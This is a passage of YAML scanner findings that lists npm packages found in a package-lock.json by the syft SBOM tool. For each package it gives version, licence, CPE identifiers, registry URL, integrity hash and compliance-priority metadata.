title: p-try 2.2.0
|
|
description: 'Package discovered: p-try 2.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ee061a11e32e10c1
|
|
name: p-try
|
|
version: 2.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:p-try:p-try:2.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p-try:p_try:2.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p_try:p-try:2.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p_try:p_try:2.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p:p-try:2.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:p:p_try:2.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/p-try@2.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz
|
|
integrity: sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8f14c9999630c748
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: package-json-from-dist 1.0.1'
|
|
title: package-json-from-dist 1.0.1
|
|
description: 'Package discovered: package-json-from-dist 1.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d82606f27243dac6
|
|
name: package-json-from-dist
|
|
version: 1.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BlueOak-1.0.0
|
|
spdxExpression: BlueOak-1.0.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:package-json-from-dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package-json-from-dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package_json_from_dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package_json_from_dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package-json-from:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package-json-from:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package_json_from:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package_json_from:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package-json:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package-json:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package_json:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package_json:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:package:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/package-json-from-dist@1.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz
|
|
integrity: sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 09093ffb9ed76376
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: pako 0.2.9'
|
|
title: pako 0.2.9
|
|
description: 'Package discovered: pako 0.2.9'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7762d448aa187997
|
|
name: pako
|
|
version: 0.2.9
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: (MIT AND Zlib)
|
|
spdxExpression: (MIT AND Zlib)
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:pako:pako:0.2.9:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/pako@0.2.9
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/pako/-/pako-0.2.9.tgz
|
|
integrity: sha512-NUcwaKxUxWrZLpDG+z/xZaCgQITkA/Dv4V/T6bw7VON6l1Xz/VnrBqrYjZQ12TamKHzITTfOEIYUj48y2KXImA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d21476c4aa5bcc9d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: pako 1.0.11'
|
|
title: pako 1.0.11
|
|
description: 'Package discovered: pako 1.0.11'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8811cee431746c6d
|
|
name: pako
|
|
version: 1.0.11
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: (MIT AND Zlib)
|
|
spdxExpression: (MIT AND Zlib)
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:pako:pako:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/pako@1.0.11
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/pako/-/pako-1.0.11.tgz
|
|
integrity: sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b50b24498bc5a2c6
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: parse-svg-path 0.1.2'
|
|
title: parse-svg-path 0.1.2
|
|
description: 'Package discovered: parse-svg-path 0.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7c5d21eaeee09ad2
|
|
name: parse-svg-path
|
|
version: 0.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:parse-svg-path:parse-svg-path:0.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:parse-svg-path:parse_svg_path:0.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:parse_svg_path:parse-svg-path:0.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:parse_svg_path:parse_svg_path:0.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:parse-svg:parse-svg-path:0.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:parse-svg:parse_svg_path:0.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:parse_svg:parse-svg-path:0.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:parse_svg:parse_svg_path:0.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:parse:parse-svg-path:0.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:parse:parse_svg_path:0.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/parse-svg-path@0.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/parse-svg-path/-/parse-svg-path-0.1.2.tgz
|
|
integrity: sha512-JyPSBnkTJ0AI8GGJLfMXvKq42cj5c006fnLz6fXy6zfoVjJizi8BNTpu8on8ziI1cKy9d9DGNuY17Ce7wuejpQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 09bae738f1e39a33
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: parseley 0.12.1'
|
|
title: parseley 0.12.1
|
|
description: 'Package discovered: parseley 0.12.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 22f6c66ddf9c06f1
|
|
name: parseley
|
|
version: 0.12.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:parseley:parseley:0.12.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/parseley@0.12.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/parseley/-/parseley-0.12.1.tgz
|
|
integrity: sha512-e6qHKe3a9HWr0oMRVDTRhKce+bRO8VGQR3NyVwcjwrbhMmFCX9KszEV35+rn4AdilFAq9VPxP/Fe1wC9Qjd2lw==
|
|
dependencies:
|
|
leac: ^0.6.0
|
|
peberminta: ^0.9.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 37de8d05673d8403
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: parseurl 1.3.3'
|
|
title: parseurl 1.3.3
|
|
description: 'Package discovered: parseurl 1.3.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 484c0b9a6084b4bb
|
|
name: parseurl
|
|
version: 1.3.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:parseurl:parseurl:1.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/parseurl@1.3.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz
|
|
integrity: sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4b3d2fa0f1f98ea0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: path-exists 4.0.0'
|
|
title: path-exists 4.0.0
|
|
description: 'Package discovered: path-exists 4.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7c130f49f1f39739
|
|
name: path-exists
|
|
version: 4.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:path-exists:path-exists:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path-exists:path_exists:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_exists:path-exists:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_exists:path_exists:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path:path-exists:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path:path_exists:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/path-exists@4.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz
|
|
integrity: sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5bb936b7686247f0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: path-expression-matcher 1.5.0'
|
|
title: path-expression-matcher 1.5.0
|
|
description: 'Package discovered: path-expression-matcher 1.5.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 802e4db060f878e6
|
|
name: path-expression-matcher
|
|
version: 1.5.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:path-expression-matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path-expression-matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_expression_matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_expression_matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path-expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path-expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path:path-expression-matcher:1.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path:path_expression_matcher:1.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/path-expression-matcher@1.5.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.5.0.tgz
|
|
integrity: sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ffd71e909718c27d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: path-key 3.1.1'
|
|
title: path-key 3.1.1
|
|
description: 'Package discovered: path-key 3.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f9cf628256388076
|
|
name: path-key
|
|
version: 3.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:path-key:path-key:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path-key:path_key:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_key:path-key:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_key:path_key:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path:path-key:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path:path_key:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/path-key@3.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz
|
|
integrity: sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fbb7614ee3db4371
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: path-parse 1.0.7'
|
|
title: path-parse 1.0.7
|
|
description: 'Package discovered: path-parse 1.0.7'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9cf335be710ffc91
|
|
name: path-parse
|
|
version: 1.0.7
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:path-parse_project:path-parse:1.0.7:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/path-parse@1.0.7
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz
|
|
integrity: sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 135178fee69fc7b7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: path-scurry 1.11.1'
|
|
title: path-scurry 1.11.1
|
|
description: 'Package discovered: path-scurry 1.11.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f605927959537dfd
|
|
name: path-scurry
|
|
version: 1.11.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BlueOak-1.0.0
|
|
spdxExpression: BlueOak-1.0.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
